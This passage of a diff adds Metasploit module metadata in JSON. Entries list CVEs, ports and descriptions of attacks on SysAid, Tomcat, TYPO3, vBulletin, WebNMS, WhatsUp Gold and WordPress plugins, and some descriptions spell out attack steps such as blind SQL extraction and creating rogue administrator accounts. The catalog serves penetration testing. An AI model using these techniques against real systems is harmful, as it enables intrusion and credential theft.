"CVE-2015-2993", + "URL-https://seclists.org/fulldisclosure/2015/Jun/8", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/sysaid_admin_acct.rb", + "is_install_path": true, + "ref_name": "admin/http/sysaid_admin_acct", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/sysaid_file_download": { + "name": "SysAid Help Desk Arbitrary File Download", + "fullname": "auxiliary/admin/http/sysaid_file_download", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-06-03", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits two vulnerabilities in SysAid Help Desk that allows\n an unauthenticated user to download arbitrary files from the system. First, an\n information disclosure vulnerability (CVE-2015-2997) is used to obtain the file\n system path, and then we abuse a directory traversal (CVE-2015-2996) to download\n the file. Note that there are some limitations on Windows, in that the information\n disclosure vulnerability doesn't work on a Windows platform, and we can only\n traverse the current drive (if you enter C:\\afile.txt and the server is running\n on D:\\ the file will not be downloaded).\n\n This module has been tested with SysAid 14.4 on Windows and Linux.", + "references": [ + "CVE-2015-2996", + "CVE-2015-2997", + "URL-https://seclists.org/fulldisclosure/2015/Jun/8", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/sysaid_file_download.rb", + "is_install_path": true, + "ref_name": "admin/http/sysaid_file_download", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/sysaid_sql_creds": { + "name": "SysAid Help Desk Database Credentials Disclosure", + "fullname": "auxiliary/admin/http/sysaid_sql_creds", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-06-03", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to download arbitrary files from the system. This is used to download the server\n configuration file that contains the database username and password, which is encrypted\n with a fixed, known key. This module has been tested with SysAid 14.4 on Windows and Linux.", + "references": [ + "CVE-2015-2996", + "CVE-2015-2998", + "URL-https://seclists.org/fulldisclosure/2015/Jun/8", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/sysaid_sql_creds.rb", + "is_install_path": true, + "ref_name": "admin/http/sysaid_sql_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/telpho10_credential_dump": { + "name": "Telpho10 Backup Credentials Dumper", + "fullname": "auxiliary/admin/http/telpho10_credential_dump", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-09-02", + "type": "auxiliary", + "author": [ + "Jan Rude" + ], + "description": "This module exploits a vulnerability present in all versions of Telpho10 telephone system\n appliance. This module generates a configuration backup of Telpho10,\n downloads the file and dumps the credentials for admin login,\n phpmyadmin, phpldapadmin, etc.\n This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/telpho10_credential_dump.rb", + "is_install_path": true, + "ref_name": "admin/http/telpho10_credential_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/tomcat_administration": { + "name": "Tomcat Administration Tool Default Access", + "fullname": "auxiliary/admin/http/tomcat_administration", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Matteo Cantoni " + ], + "description": "Detect the Tomcat administration interface. The administration interface is included in versions 5.5 and lower.\n Port 8180 is the default for FreeBSD, 8080 for all others.", + "references": [ + "URL-http://tomcat.apache.org/" + ], + "platform": "", + "arch": "", + "rport": 8180, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/tomcat_administration.rb", + "is_install_path": true, + "ref_name": "admin/http/tomcat_administration", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/tomcat_ghostcat": { + "name": "Apache Tomcat AJP File Read", + "fullname": "auxiliary/admin/http/tomcat_ghostcat", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-02-20", + "type": "auxiliary", + "author": [ + "A Security Researcher of Chaitin Tech", + "SunCSR Team" + ], + "description": "When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache\n Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection.\n If such connections are available to an attacker, they can be exploited in ways that may be surprising.\n\n In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP\n Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended\n in the security guide) that this Connector would be disabled if not required. This vulnerability report\n identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application -\n processing any file in the web application as a JSP. Further, if the web application allowed file upload\n and stored those files within the web application (or the attacker was able to control the content of the\n web application by some other means) then this, along with the ability to process a file as a JSP, made\n remote code execution possible.\n\n It is important to note that mitigation is only required if an AJP port is accessible to untrusted users.\n Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files\n and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were\n made to the default AJP Connector configuration in 9.0.31 to harden the default configuration.\n It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes\n to their configurations.", + "references": [ + "CVE-2020-1938", + "EDB-48143", + "URL-http://web.archive.org/web/20250114042903/https://www.chaitin.cn/en/ghostcat" + ], + "platform": "", + "arch": "", + "rport": 8009, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/http/tomcat_ghostcat.rb", + "is_install_path": true, + "ref_name": "admin/http/tomcat_ghostcat", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "Ghostcat" + ], + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/tomcat_utf8_traversal": { + "name": "Tomcat UTF-8 Directory Traversal Vulnerability", + "fullname": "auxiliary/admin/http/tomcat_utf8_traversal", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-01-09", + "type": "auxiliary", + "author": [ + "aushack ", + "guerrino di massa" + ], + "description": "This module tests whether a directory traversal vulnerability is present\n in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0\n - 6.0.16 under specific and non-default installations. The connector must have\n allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the\n vulnerability actually occurs within Java and not Tomcat; the server must\n use Java versions prior to Sun 1.4.2_19, 1.5.0_17, 6u11 - or prior IBM Java\n 5.0 SR9, 1.4.2 SR13, SE 6 SR4 releases. This module has only been tested against\n RedHat 9 running Tomcat 6.0.16 and Sun JRE 1.5.0-05. You may wish to change\n FILE (hosts,sensitive files), MAXDIRS and RPORT depending on your environment.", + "references": [ + "URL-http://tomcat.apache.org/", + "OSVDB-47464", + "CVE-2008-2938", + "URL-http://www.securityfocus.com/archive/1/499926" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb", + "is_install_path": true, + "ref_name": "admin/http/tomcat_utf8_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/trendmicro_dlp_traversal": { + "name": "TrendMicro Data Loss Prevention 5.5 Directory Traversal", + "fullname": "auxiliary/admin/http/trendmicro_dlp_traversal", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-01-09", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module tests whether a directory traversal vulnerability is present\n in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294.\n The vulnerability appears to be actually caused by the Tomcat UTF-8\n bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938.\n This module simply tests for the same bug with Trend Micro specific settings.\n Note that in the Trend Micro appliance, /etc/shadow is not used and therefore\n password hashes are stored and anonymously accessible in the passwd file.", + "references": [ + "URL-http://tomcat.apache.org/", + "OSVDB-47464", + "OSVDB-73447", + "CVE-2008-2938", + "URL-http://www.securityfocus.com/archive/1/499926", + "EDB-17388", + "BID-48225" + ], + "platform": "", + "arch": "", + "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb", + "is_install_path": true, + "ref_name": "admin/http/trendmicro_dlp_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/typo3_news_module_sqli": { + "name": "TYPO3 News Module SQL Injection", + "fullname": "auxiliary/admin/http/typo3_news_module_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-04-06", + "type": "auxiliary", + "author": [ + "Marco Rivoli", + "Charles Fol" + ], + "description": "This module exploits a SQL Injection vulnerability In TYPO3 NewsController.php\n in the news module 5.3.2 and earlier. It allows an unauthenticated user to execute arbitrary\n SQL commands via vectors involving overwriteDemand and OrderByAllowed. The SQL injection\n can be used to obtain password hashes for application user accounts. This module has been\n tested on TYPO3 3.16.0 running news extension 5.0.0.\n\n This module tries to extract username and password hash of the administrator user.\n It tries to inject sql and check every letter of a pattern, to see\n if it belongs to the username or password it tries to alter the ordering of results. If\n the letter doesn't belong to the word being extracted then all results are inverted\n (News #2 appears before News #1, so Pattern2 before Pattern1), instead if the letter belongs\n to the word being extracted then the results are in proper order (News #1 appears before News #2,\n so Pattern1 before Pattern2)", + "references": [ + "CVE-2017-7581", + "URL-http://www.ambionics.io/blog/typo3-news-module-sqli" + ], + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/typo3_news_module_sqli.rb", + "is_install_path": true, + "ref_name": "admin/http/typo3_news_module_sqli", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/typo3_sa_2009_001": { + "name": "TYPO3 sa-2009-001 Weak Encryption Key File Disclosure", + "fullname": "auxiliary/admin/http/typo3_sa_2009_001", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-01-20", + "type": "auxiliary", + "author": [ + "Chris John Riley" + ], + "description": "This module exploits a flaw in TYPO3 encryption ey creation process to allow for\n file disclosure in the jumpUrl mechanism. This flaw can be used to read any file\n that the web server user account has access to view.", + "references": [ + "CVE-2009-0255", + "OSVDB-51536", + "URL-http://blog.c22.cc/advisories/typo3-sa-2009-001", + "URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-001/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/typo3_sa_2009_001.rb", + "is_install_path": true, + "ref_name": "admin/http/typo3_sa_2009_001", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/typo3_sa_2009_002": { + "name": "Typo3 sa-2009-002 File Disclosure", + "fullname": "auxiliary/admin/http/typo3_sa_2009_002", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-02-10", + "type": "auxiliary", + "author": [ + "spinbad " + ], + "description": "This module exploits a file disclosure vulnerability in the jumpUrl mechanism of\n Typo3. This flaw can be used to read any file that the web server user account has\n access to.", + "references": [ + "OSVDB-52048", + "CVE-2009-0815", + "URL-http://web.archive.org/web/20090212165636/http://secunia.com:80/advisories/33829/", + "EDB-8038", + "URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/auxiliary/admin/http/typo3_sa_2009_002.rb", + "is_install_path": true, + "ref_name": "admin/http/typo3_sa_2009_002", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Download", + "description": "Download arbitrary file" + } + ] + }, + "auxiliary_admin/http/typo3_sa_2010_020": { + "name": "TYPO3 sa-2010-020 Remote File Disclosure", + "fullname": "auxiliary/admin/http/typo3_sa_2010_020", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Chris John Riley", + "Gregor Kopf" + ], + "description": "This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.\n Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.\n This flaw can be used to read any file that the web server user account has access to view.", + "references": [ + "CVE-2010-3714", + "URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020", + "URL-http://web.archive.org/web/20180126053019/http://gregorkopf.de/slides_berlinsides_2010.pdf" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-07 12:36:11 +0000", + "path": "/modules/auxiliary/admin/http/typo3_sa_2010_020.rb", + "is_install_path": true, + "ref_name": "admin/http/typo3_sa_2010_020", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/typo3_winstaller_default_enc_keys": { + "name": "TYPO3 Winstaller Default Encryption Keys", + "fullname": "auxiliary/admin/http/typo3_winstaller_default_enc_keys", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Chris John Riley" + ], + "description": "This module exploits known default encryption keys found in the TYPO3 Winstaller.\n This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be\n used to read any file that the web server user account has access to view.\n\n The method used to create the juhash (short MD5 hash) was altered in later versions\n of Typo3. Use the show actions command to display and select the version of TYPO3 in\n use (defaults to the older method of juhash creation).", + "references": [ + "URL-http://typo3winstaller.sourceforge.net/" + ], + "platform": "", + "arch": "", + "rport": 8503, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb", + "is_install_path": true, + "ref_name": "admin/http/typo3_winstaller_default_enc_keys", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "HMAC_SHA1", + "description": "TYPO3 4.2.15 (or later), 4.3.7 (or later), 4.4.4 (or later), 4.5.0 (or later)" + }, + { + "name": "MIME", + "description": "TYPO3 4.1.14 (or later), 4.2.13 - 4.2.14, 4.3.4 - 4.3.6, or 4.4.1 - 4.4.3" + }, + { + "name": "Short_MD5", + "description": "TYPO3 4.1.13 (or earlier), 4.2.12 (or earlier), 4.3.3 (or earlier), or 4.4.0" + } + ] + }, + "auxiliary_admin/http/ulterius_file_download": { + "name": "Ulterius Server File Download Vulnerability", + "fullname": "auxiliary/admin/http/ulterius_file_download", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Rick Osgood", + "Jacob Robles" + ], + "description": "This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0\n to download files from the affected host. A valid file path is needed to download a file.\n Fortunately, Ulterius indexes every file on the system, which can be stored in the\n following location:\n\n http://ulteriusURL:port/.../fileIndex.db.\n\n This module can download and parse the fileIndex.db file. There is also an option to\n download a file using a provided path.", + "references": [ + "EDB-43141", + "CVE-2017-16806" + ], + "platform": "", + "arch": "", + "rport": 22006, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/ulterius_file_download.rb", + "is_install_path": true, + "ref_name": "admin/http/ulterius_file_download", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/vbulletin_upgrade_admin": { + "name": "vBulletin Administrator Account Creation", + "fullname": "auxiliary/admin/http/vbulletin_upgrade_admin", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-09", + "type": "auxiliary", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module abuses the \"install/upgrade.php\" component on vBulletin 4.1+ and 4.5+ to\n create a new administrator account, as exploited in the wild on October 2013. This module\n has been tested successfully on vBulletin 4.1.5 and 4.1.0.", + "references": [ + "CVE-2013-6129", + "URL-http://blog.imperva.com/2013/10/threat-advisory-a-vbulletin-exploit-administrator-injection.html", + "OSVDB-98370", + "URL-http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb", + "is_install_path": true, + "ref_name": "admin/http/vbulletin_upgrade_admin", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/webnms_cred_disclosure": { + "name": "WebNMS Framework Server Credential Disclosure", + "fullname": "auxiliary/admin/http/webnms_cred_disclosure", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-07-04", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract\n all user credentials. The first vulnerability is an unauthenticated file download\n in the FetchFile servlet, which is used to download the file containing the user\n credentials. The second vulnerability is that the passwords in the file are\n obfuscated with a very weak algorithm which can be easily reversed.\n This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\n Windows and Linux.", + "references": [ + "CVE-2016-6601", + "CVE-2016-6602", + "URL-https://blogs.securiteam.com/index.php/archives/2712", + "URL-https://seclists.org/fulldisclosure/2016/Aug/54" + ], + "platform": "", + "arch": "", + "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/webnms_cred_disclosure.rb", + "is_install_path": true, + "ref_name": "admin/http/webnms_cred_disclosure", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/webnms_file_download": { + "name": "WebNMS Framework Server Arbitrary Text File Download", + "fullname": "auxiliary/admin/http/webnms_file_download", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-07-04", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an\n unauthenticated user to download files off the file system by using a directory\n traversal attack on the FetchFile servlet.\n Note that only text files can be downloaded properly, as any binary file will get\n mangled by the servlet. Also note that for Windows targets you can only download\n files that are in the same drive as the WebNMS installation.\n This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\n Windows and Linux.", + "references": [ + "CVE-2016-6601", + "URL-https://blogs.securiteam.com/index.php/archives/2712", + "URL-https://seclists.org/fulldisclosure/2016/Aug/54" + ], + "platform": "", + "arch": "", + "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/webnms_file_download.rb", + "is_install_path": true, + "ref_name": "admin/http/webnms_file_download", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/whatsup_gold_sqli": { + "name": "WhatsUp Gold SQL Injection (CVE-2024-6670)", + "fullname": "auxiliary/admin/http/whatsup_gold_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-08-29", + "type": "auxiliary", + "author": [ + "Michael Heinzl", + "Sina Kheirkhah ( " + ], + "description": "This module exploits a SQL injection vulnerability in WhatsUp Gold, by changing the password of an existing user (such as of the default admin account)\n to an attacker-controlled one.\n\n WhatsUp Gold versions < v24.0.0 are affected.", + "references": [ + "CVE-2024-6670", + "URL-https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024", + "URL-https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/", + "URL-https://www.zerodayinitiative.com/advisories/ZDI-24-1185/" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-09-26 04:01:36 +0000", + "path": "/modules/auxiliary/admin/http/whatsup_gold_sqli.rb", + "is_install_path": true, + "ref_name": "admin/http/whatsup_gold_sqli", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_automatic_plugin_privesc": { + "name": "WordPress Plugin Automatic Config Change to RCE", + "fullname": "auxiliary/admin/http/wp_automatic_plugin_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-09-06", + "type": "auxiliary", + "author": [ + "h00die", + "Jerome Bruandet" + ], + "description": "This module exploits an unauthenticated arbitrary wordpress options change vulnerability\n in the Automatic (wp-automatic) plugin <= 3.53.2. If WPEMAIL is provided, the administrator's email\n address will be changed. User registration is\n enabled, and default user role is set to administrator. A user is then created with\n the USER name set. A valid EMAIL is required to get the registration email (not handled in MSF).", + "references": [ + "URL-https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/" + ], + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-10-03 19:50:04 +0000", + "path": "/modules/auxiliary/admin/http/wp_automatic_plugin_privesc.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_automatic_plugin_privesc", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "config-changes", + "ioc-in-logs" + ], + "NOCVE": [ + "Patched in 3.53.3 without vendor disclosure" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_custom_contact_forms": { + "name": "WordPress custom-contact-forms Plugin SQL Upload", + "fullname": "auxiliary/admin/http/wp_custom_contact_forms", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-08-07", + "type": "auxiliary", + "author": [ + "Marc-Alexandre Montpas", + "Christian Mehlmauer " + ], + "description": "The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download\n a SQL dump of the plugins database tables. It's also possible to upload files containing\n SQL statements which will be executed. The module first tries to extract the WordPress\n table prefix from the dump and then attempts to create a new admin user.", + "references": [ + "URL-http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html", + "URL-https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=", + "WPVDB-7542" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/wp_custom_contact_forms.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_custom_contact_forms", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_easycart_privilege_escalation": { + "name": "WordPress WP EasyCart Plugin Privilege Escalation", + "fullname": "auxiliary/admin/http/wp_easycart_privilege_escalation", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-02-25", + "type": "auxiliary", + "author": [ + "rastating" + ], + "description": "The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated\n users of any user level to set any system option via a lack of validation in the\n ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in\n /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address\n to prevent any notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default role to\n be administrator. This will allow for the user to create a new account with admin\n privileges via the default registration page found at /wp-login.php?action=register.", + "references": [ + "CVE-2015-2673", + "WPVDB-7808", + "URL-https://rastating.github.io/wp-easycart-privilege-escalation-information-disclosure/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_easycart_privilege_escalation", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_gdpr_compliance_privesc": { + "name": "WordPress WP GDPR Compliance Plugin Privilege Escalation", + "fullname": "auxiliary/admin/http/wp_gdpr_compliance_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-11-08", + "type": "auxiliary", + "author": [ + "Mikey Veenstra (WordFence)", + "Thomas Labadie" + ], + "description": "The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set\n wordpress administration options by overwriting values within the database.\n\n The vulnerability is present in WordPress’s admin-ajax.php, which allows unauthorized\n users to trigger handlers and make configuration changes because of a failure to do\n capability checks when executing the 'save_setting' internal action.\n\n WARNING: The module sets Wordpress configuration options without reading their current\n values and restoring them later.", + "references": [ + "URL-https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/", + "CVE-2018-19207", + "WPVDB-9144" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 